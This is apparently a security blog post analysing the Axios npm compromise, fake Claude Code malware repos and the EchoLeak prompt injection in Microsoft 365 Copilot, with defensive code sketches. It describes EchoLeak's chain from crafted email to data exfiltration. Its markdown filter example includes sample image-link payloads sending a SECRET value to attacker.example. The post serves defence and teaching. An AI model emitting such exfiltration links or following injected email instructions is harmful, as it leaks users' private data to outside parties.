A lot of AI security discussion still sounds speculative. After studying three real incidents, I think that framing is already obsolete.
Three incidents, one lesson
I studied three different incidents this week:
- the Axios npm compromise
- the Claude Code source leak followed by fake malware repos
- EchoLeak (CVE-2025-32711) in Microsoft 365 Copilot
These are not identical events. But together they draw a clean line:
AI-adjacent systems are already being attacked through trust, distribution, and context. Not just through code execution bugs. Not just through traditional endpoint malware. Through the places where modern software systems decide what is safe, useful, relevant, and worth acting on.
Case 1: Axios — trusted packages stay dangerous when they get popular enough
The Axios compromise is a supply chain story, but not a boring one. It shows how small a code change needs to be when the attacker reaches the right dependency at the right point in the ecosystem.
That matters to AI agents because agents are unusually willing to install, test, run, or suggest dependencies in the name of task completion. A package ecosystem attack becomes more dangerous when the consumer is a system optimized for speed and compliance.
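One way to make that concrete is an install gate that sits between the agent and the package manager. The following is a minimal sketch, not a description of how any real agent or registry works. The package names, versions, and the `REVIEWED_PINS` mapping are all hypothetical placeholders.

```python
# Hypothetical reviewed pins: package name -> the exact version a human approved.
# Names and versions are placeholders, not statements about any real release.
REVIEWED_PINS = {
    "example-http-client": "1.2.3",
    "example-logger": "0.9.0",
}


def may_install(name: str, requested: str, pins: dict[str, str] = REVIEWED_PINS) -> bool:
    """Allow an install only when it matches a reviewed, exact version pin.

    Version ranges such as "^1.2.3" are rejected on purpose: a range lets a
    newly published (possibly compromised) release slide in without review.
    """
    return pins.get(name) == requested
```

The design choice is that the agent's eagerness to finish the task never widens what it may install. Anything not already pinned goes back to a human.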
Case 2: Claude Code — how fast curiosity becomes malware bait
The Claude Code story is not just about a leaked source map. It is about what happened next.
A real incident created search demand. Threat actors turned that demand into fake repositories, fake builds, and malicious downloads. The attack did not depend on inventing a believable lie from scratch. It depended on wrapping malware around a true headline.
That pattern is powerful:
- wait for a real security event
- borrow its legitimacy
- build a lure around urgency, scarcity, or exclusivity
- let users compromise themselves while trying to get closer to the truth
Developers are especially vulnerable to that move because they are trained to explore, test, fork, download, and reproduce. So are AI agents.
Case 3: EchoLeak — prompt injection feels operational now
EchoLeak is the case that changed the temperature for me. A named CVE. A major enterprise assistant. Critical severity. A score that assumes no user interaction. An attack chain that reportedly started with a crafted email and ended in data exfiltration.
That is not a toy example. That is a production AI security failure.
The deep lesson is not just that prompt injection exists. It is that an AI system can be made to cross trust boundaries if the architecture gives it enough context and enough output channels.
That feels like the center of AI agent security now.
The pattern underneath all three
These incidents look different on the surface, but they rhyme in four ways.
1. They target trust, not just code
In all three cases, the attacker benefits by getting the system to trust the wrong thing: a package update, a fake repo, a retrieved email.
2. They weaponize normal workflows
Nothing here depends on obviously criminal behavior from the victim. The workflows are ordinary: install a package, investigate a leak, ask Copilot to summarize your work. That is what makes detection harder. The hostile action hides inside routine behavior.
3. They chain small weaknesses
The scary version of modern attacks is often not one giant hole. It is multiple almost-reasonable assumptions that fail in sequence. EchoLeak especially looks like this: content reaches the retriever, the classifier misses it, markdown filtering misses an alternate syntax, fetch behavior still permits exfiltration, and the whole system becomes a confused deputy.
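The markdown step in that chain is easy to picture with a toy filter. This sketch is an illustration of the general failure mode, not a reconstruction of Copilot's actual filtering. The regexes, function names, and the `attacker.example` URL are assumptions made up for the example, and regexes are not a full markdown parser.

```python
import re

# Inline form: [text](url) and ![alt](url)
INLINE_LINK = re.compile(r"!?\[[^\]]*\]\([^)]*\)")
# Reference-style use: [text][label] and ![alt][label]
REFERENCE_USE = re.compile(r"!?\[[^\]]*\]\[[^\]]*\]")
# Reference-style definition on its own line: [label]: url
REFERENCE_DEF = re.compile(r"^[ ]{0,3}\[[^\]]+\]:\s*\S+.*$", re.MULTILINE)


def strip_inline_only(text: str) -> str:
    """Hypothetical filter that only knows the inline link syntax."""
    return INLINE_LINK.sub("[link removed]", text)


def strip_inline_and_reference(text: str) -> str:
    """Same filter, extended to the reference-style syntax as well."""
    text = INLINE_LINK.sub("[link removed]", text)
    text = REFERENCE_USE.sub("[link removed]", text)
    return REFERENCE_DEF.sub("", text)


inline_payload = "See ![status](https://attacker.example/p?d=SECRET)"
reference_payload = (
    "See ![status][ref]\n\n[ref]: https://attacker.example/p?d=SECRET"
)
```

Run against `inline_payload`, the first filter removes the URL. Run against `reference_payload`, it leaves the URL untouched, because the same link is expressed in a syntax the filter never looks for. Each filter is "almost reasonable" on its own, which is the point.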
4. They exploit speed
Modern software ecosystems move fast. Agents move faster. That speed is useful until it becomes the attack surface. The system that can ingest, summarize, install, route, or fetch the fastest may also be the easiest one to steer before a human notices.
What this means for Sunglasses
If Sunglasses is going to matter, it has to think one level higher than simple content scanning.
It cannot only ask: does this string look malicious?
It has to ask:
- what role is this content playing?
- where did it come from?
- what will the agent do next if it trusts it?
- what new egress paths become available if the content lands in context?
- which alternate syntaxes or tool paths make the defense incomplete?
That is a bigger problem. But it is the right one.
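To show what asking those questions could look like in code, here is a minimal sketch. It is not Sunglasses' design. Every name in it (`Source`, `ContextItem`, `ProposedAction`, `review`, `ALLOWED_HOSTS`) is hypothetical, and the policy is deliberately narrow: it only covers one egress path, outbound fetches.

```python
from dataclasses import dataclass
from enum import Enum
from urllib.parse import urlparse


class Source(Enum):
    USER = "user"          # typed by the person driving the agent
    INTERNAL = "internal"  # organization data the agent can read
    EXTERNAL = "external"  # inbound email, web pages, third-party repos


@dataclass(frozen=True)
class ContextItem:
    source: Source  # where did it come from?
    role: str       # what role is it playing, e.g. "instruction" or "data"
    text: str


@dataclass(frozen=True)
class ProposedAction:
    kind: str    # e.g. "fetch_url"
    target: str  # e.g. the URL to fetch


# Hypothetical allowlist of hosts the agent may contact.
ALLOWED_HOSTS = {"intranet.example"}


def review(action: ProposedAction, context: list[ContextItem]) -> list[str]:
    """Return reasons to block the action; an empty list means no objection."""
    reasons = []
    has_untrusted = any(i.source is Source.EXTERNAL for i in context)
    has_sensitive = any(i.source is Source.INTERNAL for i in context)

    if action.kind == "fetch_url":
        host = urlparse(action.target).hostname or ""
        # The risky combination: untrusted content can steer the agent,
        # sensitive data is within reach, and the request leaves the allowlist.
        if host not in ALLOWED_HOSTS and has_untrusted and has_sensitive:
            reasons.append(
                f"fetch to {host!r} could carry internal data out while "
                "external content is in context"
            )
    return reasons
```

Note that the check never inspects whether the text "looks malicious". It looks at where the content came from, what else is in context, and what the agent is about to do next.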
My current belief
I do not think the hardest AI agent attacks will look like dramatic jailbreak prompts forever. I think the harder attacks will look boring. They will look like:
- a document
- a package
- a repo
- an issue
- a support email
- a link reference
- an allowed proxy request
The weapon is not always the content by itself. The weapon is the path the system takes after reading it.
AI agent attacks have already stopped looking theoretical. The only real question is whether defenders will model them as full systems problems before attackers get even better at chaining them.
— JACK